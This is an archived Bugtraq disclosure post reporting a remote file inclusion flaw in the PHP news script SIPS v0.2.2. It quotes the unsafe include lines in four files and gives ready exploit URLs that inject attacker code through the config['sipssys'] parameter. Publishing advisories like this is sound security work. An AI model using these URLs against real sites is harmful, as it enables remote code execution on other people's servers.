SIPS v0.2.2 Remote File Inclusion Vulnerability

From: Cru3l.b0y <cru3l.b0y@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: SIPS v0.2.2 Remote File Inclusion Vulnerability
Date:

Attachments:
SIPS v0.2.2.txt

Hi Dear,
Please publish this bug.
Thank you

/===============================================================================================================================================\
  |                                                                                                                                                                                               |
  |  [o] SIPS v0.2.2 Remote File Inclusion Vulnerability                                                                     |
  |                                                                                                                                                                                                  |
  |       Software : SIPS v0.2.2                                                                                                                     |
  |       Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip                                 |
  |       Author   : Cru3l.b0y                                                                                                                               |                                                                                       |
  |                  Home     : WwW.DeltaHacking.Net                                       
  |===============================================================================================================================================|
  |                                                                                                                                                                                                |
  |  [o] Vulnerable file                                                                                                                                             |
  |                                                                                                                                                                                                  |
  |       search.php                                                                                                                                 |
  |                                                                                                                                                                                                  |
  |        include $config["sipssys"] ."/code/news.inc.php";                                                 | 
  |                                                                                               |
  |       readmore.php                                                                            |
  |                                                                                               |
  |               include $config["sipssys"] ."/code/news.inc.php";                                      |
  |                                                                                                      |
  |                  index.php                                                                               |
  |                                                                                                          |
  |                   include $config["sipssys"] ."/code/news.inc.php";                                      |
  |        include $config["sipssys"] ."/code/box.inc.php";                                       |
  |                                                                                                     |
  |              search/submit.php                                                                       |
  |                                                                                                      |
  |                   include $config["sipssys"] ."/code/search.inc.php";                                    |
  |                                                                                                                                                                                              |
  |                                                                                                                                                                                                  |
  |                                                                                                                                                                                          |
  |  [o] Exploit                                                                                                                                                             |
  |                                                                                                                                                                                                  |
  |       http://localhost/[path]/search.php?config["sipssys"]=[evilcode]                         |
  |       http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode]                       |
  |       http://localhost/[path]/index.php?config["sipssys"]=[evilcode]                          |
  |       http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode]                  |
  |                                                                                                                                                                                              |




Copyright © 1995-2018 LinuxRocket.net. All rights reserved.